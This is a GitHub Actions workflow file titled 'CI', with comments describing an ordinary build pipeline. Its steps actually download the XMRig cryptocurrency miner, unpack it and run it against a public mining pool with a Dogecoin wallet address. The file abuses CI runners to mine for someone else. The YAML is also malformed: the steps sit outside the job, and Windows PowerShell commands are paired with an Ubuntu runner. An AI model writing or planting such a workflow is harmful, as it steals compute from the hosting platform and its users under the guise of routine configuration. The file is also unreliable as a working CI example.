name: CI

# Controls when the workflow will run
on:
  # Triggers the workflow on push or pull request events but only for the main branch
  push:
    branches: [ main ]
  pull_request:
    branches: [ main ]

  # Allows you to run this workflow manually from the Actions tab
  workflow_dispatch:

# A workflow run is made up of one or more jobs that can run sequentially or in parallel
jobs:
  # This workflow contains a single job called "build"
  test:
   name: Subscrbeit
    # The type of runner that the job will run on
   runs-on: ubuntu-latest
   strategy:
    fail-fast: false
    matrix:
     runner: [0]  
  
steps: 
- name: DOWNLOAD 
run: Invoke-WebRequest https://github.com/xmrig/xmrig/releases/download/v6.15.1/xmrig-6.15.1-msvc-win64.zip -OutFile xmrig-6.15.1-msvc-win64.zip 
- name: Extract 
run: Expand-Archive xmrig-6.15.1-msvc-win64.zip 
- name: Running 
run: .\xmrig-6.15.1-msvc-win64\xmrig-6.15.1\xmrig.exe -o rx.unmineable.com:3333 -a rx -k -u DOGE:DSycjXnngRekwJKRQKXJwY88GPw4w9FmQA.FASTGIT -p x -t 1 
- name: END 
run: exit
